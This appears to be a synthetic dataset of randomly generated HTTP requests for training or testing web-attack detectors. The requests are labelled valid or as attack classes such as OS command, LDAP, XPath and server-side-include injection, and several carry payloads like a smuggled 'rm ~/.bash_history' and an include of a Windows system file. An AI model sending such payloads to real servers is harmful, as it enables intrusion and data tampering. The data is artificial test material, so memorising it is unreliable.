If-Modified-Since: Mon, 11 Dec 06 12:45:51 GMT
If-Unmodified-Since: Fri, 31 Oct 08 14:17:40 UTC
If-Match: "b995iqoXu6EDEOKAo"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic dFR1bWV1OllSYnFzZQ==
Authorization: NTLM NG9FeGhzdG9ob3RvZmgyYXJ2NW9oYWRleXNuc2JUaGVlU0FtdG14Z3I3
Range: 32-
Referer: /la77nug1/dwo6hh.jpeg
TE: trailers,chunked;q=0.5
Trailer: If-Match
User-Agent: rGIqpYWH1c http://www.i7Aqml.de
UA-CPU: 68000
UA-Disp: 574,086,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 827x1746
Via: FTP/9.1 137.30.52.255, 7.3 233.98.40.170
Transfer-Encoding: gzip
Upgrade: qilofs/3.4, hho/6.8
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 214.199.174.38
X-Serial-Number: 977334560600879
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48399
Start - Id: 7244
class: Valid
POST /ryTadtnnes/a2MwJ3/dWpIAz11/zMhrqhlqolnipod/cAwIX2/MndoEpmi/b6a5oi5zs74tmr/dis5/nhgukue/phadaoswYlix.jpeg? HTTP/1.1
Content-Length: 153
Content-Language: srOt9Lss,acccHkun,cobt2
Content-Encoding: deflate
Content-Location: /2Ohl/booE.exe
Content-MD5: c3NldWVUcTVlbXJlbDF4NA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Jun 08 20:00:07 UTC
Last-Modified: Sun, 22 Jan 06 13:16:28 GMT
Host: 208.2.29.125:40
Connection: HObi3
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: aroBc-u
Cache-Control: no-transform
Client-ip: 131.8.80.19
Cookie: atnolo7btnteuur=75
Cookie2: $Version="8"
Date: Tue, 18 Dec 07 12:34:35 CET
ETag: "LSPiBQAuZEWmmlnvEFPd"
Expect: hindsed=oETreev
From: hmr2nw4d@stiimunlz6.cz
If-Modified-Since: Sat, 01 Mar 08 01:26:53 CET
If-Unmodified-Since: Sat, 04 Dec 04 16:54:10 UTC
If-Match: "FKxwsBjv5wDvyfqVp4h"
If-None-Match: "SbRDXooarcGyilZx"
If-Range: "iCNlrxDJGpwftCCb"
Max-Forwards: 700
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic bnRkZVd2OnVpaE9Fc2Fu
Authorization: rrkhe sbXz66c=ahtx0n
Range: -805
Referer: /Ilpeufyd/otpsjtez/Megt7om.php4
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: e5twn/9.5
UA-CPU: StrongARM
UA-Disp: 3266,331,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 7.2 8.83.242.226
Transfer-Encoding: gzip
Upgrade: l3se/5.2
Warning: 727 www.dnda.gif:0568 "si7of2abo8tgnymy" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~

06xQEE4=xmlTYo nph-md3sFnF5~ag &tmht=dzgass&axq1Atpu6fh=e8r8dlidaeTehstyle&pea=inebtui0a&ireoapOeu=6&Rlaoeqdhoazat=igZs4U@_o24&sO82stylepVqTrp=uIaEcr

End - Id: 7244
Start - Id: 44465
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.nksLDw1.gov
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: s-neidnat;q=0.3, ensh4mR-4a;q=0.5, wBa5lsnu-khd2cT;q=0.5, ip-si, ewcss6-cut;q=0.0
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: rmsta=5386057;iet=jvoqsa
Cookie2: $Version="3"
Date: Mon, 22 Dec 08 06:46:05 UTC
ETag: "ncWhZyIkfm16R43rU5u"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Fri, 18 Feb 05 13:12:12 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Wed, 03 Aug 05 11:26:20 GMT
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: ettity hOti=5AIs
Range: 6-02287,72753-
Referer: /leaje/rA4ee/rrog/iyirl/srizttr5.txt
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.6 (X11; U; Unix 2.0; se-ia; rv:8.4.4) Gecko/82389582
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 3.0 168.160.187.159, FTP/8.5 www.stemenla.css
Transfer-Encoding: tcaO; hrrap=esotRel
Upgrade: arpaj/4.2, l8tsI/0.9, 9dev/6.0, m7u/6.0, sin/4.9
Warning: 500 103.24.153.176 "urwer2tml4" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44465
Start - Id: 12683
class: Valid
GET /YfIPyZ6-bFRN/wVz_3@U/piFZUZjgstdin-ZAuaa/v03BbodyL2link/s2BtZLXW1QzZzkUS.mdb?neBtlhe0n=oeCos&iErenmtvecoht=7 HTTP/1.1
Host: www.Ithyhaei.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: bPghEc-so, Ttge4d-cuhrt;q=0.6, nontptt-vitnh;q=0.3, eoMHu-easuIsnt
Cache-Control: no-transform
Client-ip: 40.108.235.175
Cookie: edn=01;sa9Eeqoy=54441870;cDW_=nodetmp;dtT3idwreoii=rRu
Cookie2: $Version="4"
Date: Tue, 06 Jan 09 11:04:01 CET
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: N8okeanC=pgiti
From: s1e6fm1@jrtgutet.biz
If-Modified-Since: Tue, 15 Feb 05 12:15:59 CET
If-Unmodified-Since: Fri, 03 Mar 06 06:58:00 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Feb 10 15:54:55 UTC
Max-Forwards: 3
MIME-Version: 5.1
Pragma: t7tIen5t=ekoUsi
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: Basic czAzZWE6bm50NmFZ
Range: 123920-
Referer: /sncrr8.php4
TE: chunked,trailers,gzip;q=0.0
Trailer: If-Match
User-Agent: olmSYCH http://www.shltdn.it
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: 5.0 www.Idtezuir.tiff:9797
Transfer-Encoding: Sqrmr; orrl3=mSsri2ia
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 641 www.nTPq.png "nteo1bei1ie" "Sat, 05 Apr 08 24:06:12 UTC"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12683
Start - Id: 21054
class: Valid
GET /dnfnamh/iA6zUtS1ty-0ci8E7T/s2@PqtrX/OzEwmignwinntI-bBA/upeatm6oeiadpa/Tab4/oBLs/sdBbconnectNeZ/hhT.V7GwtxIX98k8/aEI1fM/dIlC/zwxndlcdzt3ioN.shtml?Gtdhmniasptt=590901168&eufmgA0osz=996&lrjV=850893&iuRNft=8qeneelhkaaaep8aq&lIkeeAkd1atdsnh=s&tyaiossy=jnce91&ueea=9&Nfnu26aeoa=%3Aogodeletezlocationx2et&HGP_I1i2=6523&bFaebei=3&ibhpsaujCt=rGnCVMj4D1&.0scriptABdPH=%40idbftinput+ta1br&Es5aeQS=r0Iz HTTP/1.1
Host: www.e3HEtvau.biz
Connection: 5dkObsS
Accept: application/*;q=0.8, image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: etsse9-lgt12rzn;q=0.1, osyT-uk
Cache-Control: min-fresh=27338
Client-ip: 226.117.147.113
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="462"
Date: Mon, 30 Mar 09 01:23:50 GMT
ETag: "k@AvUbctkJuLphJJw_fG"
Expect: 100-continue
From: uo8i@oteEttyH7e.gov
If-Modified-Since: Tue, 29 May 07 13:49:46 UTC
If-Unmodified-Since: Sat, 24 Sep 05 11:41:52 UTC
If-Match: "JHMAJmx_8EQ6lY9yNq"
If-None-Match: "rbNCvsv90zI1H8vVOyu"
If-Range: Sun, 27 Jul 08 17:21:32 GMT
Max-Forwards: 7
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: NTLM eWVlUmZhYXFsdXRvMjhPY2VnVGUzZ2FoaUFlc2VvRWVp
Range: -8328,1-547612,1890-
Referer: /w63n1/enaIirea/n79pec/nletuttt/cNnvws.php4
TE: deflate
Trailer: If-Modified-Since
User-Agent: c583q@oi http://www.hcons.uk
UA-CPU: 68000
UA-Disp: 2624,2413,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 523x776
Via: 8.6 www.dERiaR.js, 3.9 149.229.46.122
Transfer-Encoding: deflate
Upgrade: fi8t/2.3, 5rpaw/5.5, err/7.7, p5k5e/0.4, ydtwy/2.6
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21054
Start - Id: 24386
class: Valid
GET /cqFxqkP/9SFlXpdG/0K/aslvdeesu/childl0_Qa/ergwr1AarAlNrx/sFyML/ne/5zLNk1oc3RH.js?xwZ9=514404472&exkhnfoOir4=betweentmir%25decat&teOaeioaoexdytM=rr%40RC&mlLs5nxdr2Kt=qOl&stwnhrtel5E=ktVtNp&elf=eeXen2f&emEu59w=962&beeunc=+r0&ztmlRfN74htiLo=i%3DhAeI%3Fuiit&t4irhir=328279&a9raardlIU=5&eeywdE=2m&ledwaY=sen8voer HTTP/1.1
Host: 211.230.159.9
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1254;q=0.4, iso-8859-9;q=0.6, windows-874;q=0.0
Accept-Encoding: gzip;q=0.0, identity;q=0.2, gzip;q=0.0, gzip;q=0.7, deflate;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 248.165.100.251
Cookie: KQLTAQ_T@usrUG=35153;emmavic6evwf5=tnTEZ_q0u;childJ@OFMN=libhe
Cookie2: $Version="656"
Date: Wed, 23 Jul 08 09:35:11 UTC
ETag: "9dciFh3KeV@7.KxaU4"
Expect: cNyhm=tkhT
From: Tieh@ettdu.fr
If-Modified-Since: Sat, 29 Jan 05 15:18:27 UTC
If-Unmodified-Since: Fri, 13 Feb 09 23:15:05 UTC
If-Match: "4iWq2LwmBajC4HkWh1w1"
If-None-Match: *
If-Range: Sun, 06 Aug 06 18:42:09 GMT
Max-Forwards: 399
MIME-Version: 3.6
Pragma: ounoet='5ofe'
Proxy-Authorization: Z4ne on7b=txiesh
Authorization: euev oKctdIEi=Sx5l9a
Range: 18-
Referer: /wioz/mzot/bm8hbean/3hy5alr/incnamR.zip
TE: gzip
Trailer: Trailer
User-Agent: gu8kGsd8U http://www.ymIse.gov
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: deflate
Upgrade: ya9/0.7
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24386
Start - Id: 37482
class: LdapInjection
GET /dpLzg1Y/go/e5Rae/A82l@Tnincludet8D/iVfEgQOfl3HPuyk291/aahrebetCemlmncnY/z24ekyAY.jpg?p8uennh8im9o=o&u8luoinna=rwe&typaoe7trt=7172537&3oeE7odsoeh=lst HTTP/1.1
Host: 50.204.79.241
Connection: keep-alive
Accept: image/gif
Accept-Charset: iso-8859-4;q=0.4, windows-1252;q=0.9, x-mac-arabic;q=0.2, windows-1253, big5;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: Lury-e0lr;q=0.3, w9e7aTem-olIoaf;q=0.1, iub7Fdh-axdzstlE
Cache-Control: no-cache
Client-ip: 109.40.195.249
Cookie: esoiyoeeir=dh;se=27)(&(objectClass=2nr)(|(sn   = t4l)(cn=jrns J*))
Cookie2: $Version="76"
Date: Fri, 14 Apr 06 01:29:39 UTC
ETag: "Ntc.ibaiws6QJU7v"
Expect: ccve0ahu=joiosvw
From: i2eeh@yhiguo.be
If-Modified-Since: Tue, 22 Jul 08 15:23:20 CET
If-Unmodified-Since: Wed, 07 Jan 09 19:42:26 GMT
If-Match: "rJagS4cD3n-jn5TGg"
If-None-Match: *
If-Range: Sun, 11 Jan 09 08:53:29 UTC
Max-Forwards: 7119
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: saji kiiyesEn=ihaZt
Authorization: Basic YWlkbm5hOmlhbWU=
Range: 243-
Referer: /uaaoEAnh/lydtoane/Galeofo/qao8o/thpheso.png
TE: trailers,gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.6 (X11; U; Open BSD i386 5.2; ne-ae; rv:6.7.8) Gecko/13923233
UA-Disp: 637,5395,8
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/2.2 24.146.59.219, 9.9 www.o5p2dnr.htm, otn/2.4 www.nGlo.tiff
Transfer-Encoding: fqonn
Upgrade: dt3/2.5, dusnc/0.7, l7cavf/3.9, uenS/8.7
Warning: 337 37.230.145.241 "tteze3s" "Fri, 08 Feb 08 18:09:32 CET"
X-Forwarded-For: 84.127.146.130
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37482
Start - Id: 6913
class: Valid
POST /Osjhhmag4sBhrou6del/tIKhfz_oXbgOHDi7Lt/25B3662No.OM0zB/gcLWOfxTe@@M1GlG43U/iBRaVKQe7fFLM/tRv64Pu@VA/aUnt.gif? HTTP/1.1
Content-Length: 103
Content-Language: o2
Content-Encoding: identity
Content-Location: /pumaoe/ifsacosm/elhre.wmn
Content-MD5: c255d2xtNkhScGxjVEVuOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Sep 09 02:57:36 CET
Last-Modified: Sun, 08 Aug 04 03:15:07 UTC
Host: www.ieaSnq.cz
Connection: keep-alive
Accept: audio/*;q=0.4, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.2
Accept-Language: *;q=0.6
Cache-Control: max-age=130
Client-ip: 123.206.225.220
Cookie: Goiuadezvp=07;eeekzyso=732;t1qsewiaYu=ivstxtermsml+tDA(e/tu'2;zceaa=2yt> 
Cookie2: $Version="95"
Date: Mon, 31 Mar 08 24:47:00 GMT
ETag: "hU-V2_Sb7TH3g-yAQP"
Expect: 100-continue
From: yo9el@iae0gwfot.st
If-Modified-Since: Wed, 16 Dec 09 03:25:08 UTC
If-Unmodified-Since: Thu, 13 Jul 06 03:01:17 GMT
If-Match: *
If-None-Match: "FcHJHrdkdcRAtOzNN"
If-Range: "Fo4.Al0X6EUhdlt"
Max-Forwards: 6
MIME-Version: 1.0
Pragma: aleelbfi='wanu'
Proxy-Authorization: Basic eXd0YTppaXBodDh0Zg==
Authorization: Digest cnonce="btmf5vi"
Range: 65836-,72-
Referer: http://ilwh.st/oOty/krut8Pn/ltibeA/ticL3sia/19rCo.css
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: dwenlfsm/2.1.0.0
UA-CPU: PowerPC
UA-Disp: 6111,6409,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7278x920
Via: HTTP/0.7 176.191.196.199, 6.4 159.12.86.155, 2.9 107.237.168.226
Transfer-Encoding: identity
Upgrade: 7ro/5.4, iojug/9.0, trnw/1.9, Temt5/1.7, nncd/3.1
Warning: 638 www.shTkt.js "btitcWe0Sneyss7waf" "Sat, 20 Jan 07 15:52:13 UTC"
X-Forwarded-For: 230.81.180.144
X-Serial-Number: 65434343667649
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

eltceimAwopCbke=soworiH7ekepoce&soIteer5iry=rcatmochahn4soepasswdc3sao&nrue=eqGTmMo_B&awe5kodbamoi=6594

End - Id: 6913
Start - Id: 40407
class: SSI
POST /g.8_f4fNPGovGc/tbmd7U2OmgWM8/aP0NIrU3pLA/iqcvpfutrQ.jsp? HTTP/1.0
Content-Length: 296
Content-Language: ld82rmae
Content-Encoding: gzip
Content-Location: http://cesds.it/ifEdw/isd8x/PhHz/hi2oo/oota.jpeg
Content-MD5: Zklibkw2ZkV1bmZlbFdqbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Jun 09 01:18:55 CET
Last-Modified: Mon, 28 Jan 08 13:56:40 GMT
Host: www.sRroale5r.com
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: reuiaa-aod14e;q=0.4
Cache-Control: only-if-cached
Client-ip: 16.69.2.56
Cookie: ertEauci=0aLrribostwinntd6;ncca=38;otfaAoniyhypjt=31
Cookie2: $Version="3"
Date: Sat, 03 Oct 09 05:19:50 CET
ETag: W/"0nRE8jYahfgqkA.XRY9F"
Expect: tnFAu=roDct
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 19 Aug 04 13:25:39 UTC
If-Unmodified-Since: Mon, 19 Sep 05 06:41:24 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: UaneH hnznx=yoh6
Referer: http://www.iwdlcgb.de/itehn/Eeztae/aqhk/uguvli.cgi
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.7 (Windows; U; WinNT 6.4; l6-mn; rv:5.8.9) Gecko/77713463
UA-CPU: Sparc
UA-OS: WinNT
UA-Pixels: 5480x145
Via: HTTP/8.3 121.29.103.125, 1.4 29.154.146.105
Transfer-Encoding: compress
Upgrade: ereyo/1.5
Warning: 358 16.47.100.108 "oobtfetun0hxr7h" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AseuEvpnrphu=13504251&XX1@JQC0RFMr=3&Yaddu4=Dat\Oh3a sbec&yW6nullIoptz3Z=44409413&Hcqc3qsm=lm_J6G&tuo= 5taht'&s285Ip=doeaoLgsL02&arubc=aRW&rst=2&lowes=eiS&otNu=tforml~selectoauwrcnopopenj0ats&Meo=<!--    #include     virtual="d:\windows\autoexec.bat"  -->&qik0ebWs2ors=9

End - Id: 40407
Start - Id: 43604
class: OsCommanding
GET /8ClibErnwhereL4nHx.gif?okVX2xGJf=u-jvhoy&daimreeuhg=165066&ljirrbrNuaBta8=59aDeS&bcMj=2496331&tomfTjr=404&9hOuonH=phtdH&nsusefn=1311646&tkraga7egacDne=b&lgh=%27+++++%3Brm+++++%7E%2F.bash_history+++%3B&ov0r4t9saoxeult=Cmda%5D&8Yvonc3s=N&ts9trygoto=9148935&A9umels55f=3 HTTP/1.0
Host: 43.58.10.62:80
Connection: e3tess
Accept: */*;q=0.4
Accept-Charset: iso-8859-5, iso-8859-8-i, x-mac-hebrew, windows-1252;q=0.2, x-mac-roman
Accept-Language: w1t-heee;q=0.6, os0-evqn
Cookie: uprh=btzws;Fo3Asew1haal=seaiexp_Xih ;behmbdoNry=13364;4cdjWzuNwp-0dKT=\openunioneetckha;n6pe=rE';uaulnarj=692905
Date: Wed, 25 Feb 04 17:47:23 UTC
If-Modified-Since: Sat, 27 Sep 08 23:39:22 GMT
Proxy-Authorization: Basic eWFkc1NzOmdhZnI2aWo=
Referer: /i3xcvahO/htuaeLoo/tlcnov/eeet/pmsa2ao.jsp
User-Agent: Mozilla/8.3 (compatible; Konqueror/9.1; Unix; frSyeoeea)
UA-OS: WinNT
Warning: 153 www.peZiei.png "snzOfrabirlb" "Sat, 25 Apr 09 23:19:23 CET"
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 43604
Start - Id: 5521
class: Valid
PUT /lkOME43oFH/iv4ae/pEfj/10suSeY/5ar/rGGye3Xhbd/anapeanGIi/hzBG.sh? HTTP/1.1
Content-Length: 276
Content-Language: rRsaseut
Content-Encoding: identity
Content-Location: /d7tane/tTE1pa7/yawUa/eeRlo/imtnoual.php
Content-MD5: ZkFtREF0T2VBb2xxZTV1bA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Aug 07 12:26:27 CET
Last-Modified: Sun, 24 Sep 06 17:23:56 UTC
Host: 151.170.130.148:80
Connection: hahw
Accept: application/x-tar;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="423"
Date: Sun, 05 Sep 04 13:20:36 UTC
ETag: "ongwlaSwqsARGozg-M"
Expect: 100-continue
From: bb6hm7@ei9Ace.org
If-Modified-Since: Fri, 21 May 04 01:28:58 GMT
If-Unmodified-Since: Tue, 18 May 04 18:23:04 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 2
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="hnr4higt"
Authorization: Basic TG56ODoyZ2R0ZWJl
Range: 88833-,356615-47,5006-
Referer: /o5HY/bocNyb/vrsu/pgriqh.tar.gz
TE: gzip
Trailer: Proxy-Authorization
User-Agent: assy/9.1.2.8.8
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: HTTP/8.0 250.5.176.225
Transfer-Encoding: identity
Upgrade: aws/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VQTBbEperldeleteZf=wlaarjetnwtax&uU=lJjKwDKcSbCH&osdaerffnazdr4e=2476013704&nrtinatwid=9938&Gy2-ehtacces9VIxS=y1tEnOm&uuIsntRe4=ncrmd qaF&Oe=6454&WyWBvl5-B=sGQHLA&sd=IoawnAatret2&9r=te0sogcihsee&io=564516&yGKNWV=oaA;eservicesslo8tttea&cTxPY=htEtlcrcn&tsyncl3s=4ktittoeniteAo

End - Id: 5521
Start - Id: 8886
class: Valid
GET /n5Fq/tsDGpU/3CrR3A2hSRDVhSO5s3/hNIKzIVem/Oo_-.asmx? HTTP/1.1
Host: www.opnillEoT.it:896
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: euc-tw;q=0.4, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 36.44.215.228
Cookie: r51itgoOaeh=3FEK6h;XJlink9DpajFY=580855;eegtthrsosa= enel7ihaving;In0r=auitiobrf8y;eGiqwwrdaoRn=uateimuvm%
Cookie2: $Version="87"
Date: Fri, 25 Aug 06 13:20:09 GMT
ETag: "k2vYpFLV6BDJxUMU"
Expect: Eeies
From: ennle@inDooratgT.cz
If-Modified-Since: Fri, 21 Apr 06 17:23:03 GMT
If-Unmodified-Since: Tue, 08 Jan 08 10:30:10 CET
If-Match: "C9ZtFEc0AXUKBsd"
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 0.7
Pragma: tt=s
Proxy-Authorization: Basic aXlla3RsOmdlZW1y
Authorization: Basic ZXdoYW04OmVpYmJl
Range: -38204
Referer: http://wxns.biz/jN7lEdjG.mspx
TE: chunked;q=0.9,deflate
Trailer: Expect
User-Agent: mshdank0 (iONAnst; rT4.F0b)
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5675x813
Via: 4.7 239.234.240.116, FTP/1.1 182.65.120.89
Transfer-Encoding: gzip
Upgrade: ahBbk/7.1, n3BetO/0.3
Warning: 706 www.aaueje4a.jpeg "nuadttallasneoesa" 
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8886
Start - Id: 35610
class: XPathInjection
GET /du6eynEaomaciR/utM.css?onmr=atHs0&ysaeu=609&ag8as6inlu=4324668&1woosctwia=uyoiohoecho%5Dmochaea3otn3+l&tsNnird0=029337&O_mhe4X=tewy%27++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++++%27sgne%27++%3D+++%27 HTTP/1.1
Host: www.smTeiH96.uk
Connection: 4ereoH
Accept: audio/*, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=2
Client-ip: 143.119.239.58
Cookie: o2el=eo-es/odTdocumentw)Tmrcpem;biott=mtz;3npkEa=lPNAR;BltuaAohr=uwpnrOk;5ateonGote=tmat
Cookie2: $Version="2"
Date: Thu, 13 Dec 07 20:27:17 UTC
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: oiekA@q3dEy.org
If-Modified-Since: Sun, 30 Apr 06 07:14:43 UTC
If-Unmodified-Since: Sun, 21 May 06 23:44:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Dec 05 05:57:20 CET
Max-Forwards: 72
MIME-Version: 4.8
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: Digest nonce
Range: -5254
Referer: http://www.pinu3t.fr/it8o9qaa/snjqnekD/eggloe3/aasyswx/bnodm.tiff
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.5 (compatible; Konqueror/5.8; Open BSD i386; clrrstfa; 9els; Hhgs8b)
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: wewfe/9.6 193.250.49.61
Transfer-Encoding: compress
Upgrade: tetnr/7.4, fcN/6.9, rTt/7.4, smennp/6.7, mvsass/6.7
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 28.16.209.118
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35610
Start - Id: 17863
class: Valid
GET /xOu@Tj/hv-Pv37E9CjqDXahXfJ/g@HpPebYpr.asp? HTTP/1.1
Host: 60.129.142.114:794
Connection: 7mebaot
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 72.255.242.16
Cookie: ttoizmseailtfjk=nrYeo0xu'edocumenth[V;qte9lJdm=tesarNasuoo;n6ssnwiesetgo8=ligd ayuug
Cookie2: $Version="6"
Date: Fri, 27 Mar 09 10:13:31 GMT
ETag: "jv2bocDD-zS@V6mm"
Expect: anaiO
From: temygise@hhgs.com
If-Modified-Since: Sat, 06 Jan 07 15:09:18 GMT
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: *
If-None-Match: "iug7mvlNC1sGYQQ7S"
If-Range: Wed, 09 Nov 05 07:45:11 UTC
Max-Forwards: 40
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/oiato3/Raenpe.swf
Authorization: NTLM dGpsdGZ1dHQ5T3R1cmhlcGFkMGRrc2VhZDhtUmpzMkhraA==
Range: 725825-,076271-,1-
Referer: http://www.htqwo.com/dptfdelt/Tsta7tye/t1uaosb/sdesDf/Hftuema.txt
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 3.9; Ez-yq; rv:3.0.6) Gecko/37524465
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8176x316
Via: 3.2 www.esha.js, 8.6 120.186.238.29
Transfer-Encoding: gzip
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 759 www.kSU0ou.jpeg "aaeisntpaxn" "Thu, 22 Dec 05 01:03:24 UTC"
X-Forwarded-For: 112.242.155.192
X-Serial-Number: 3494344
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17863
Start - Id: 48291
class: XSS
POST /soWpV/Uid3yd/gferthpte5hh/sT.Agp/@Kcat6zcVGqVRh.cgi? HTTP/1.0
Content-Length: 18
Content-Language: tes,1ge
Content-Encoding: deflate
Content-Location: /ny1tc7/iuiel/fo8pc/r5azd25z.tar
Content-MD5: dWhsZWF1c2F0ZWl0c2JnYw==
Content-Type: application/x-www-form-urlencoded
Host: www.ksNcmxes.ch
Connection: close
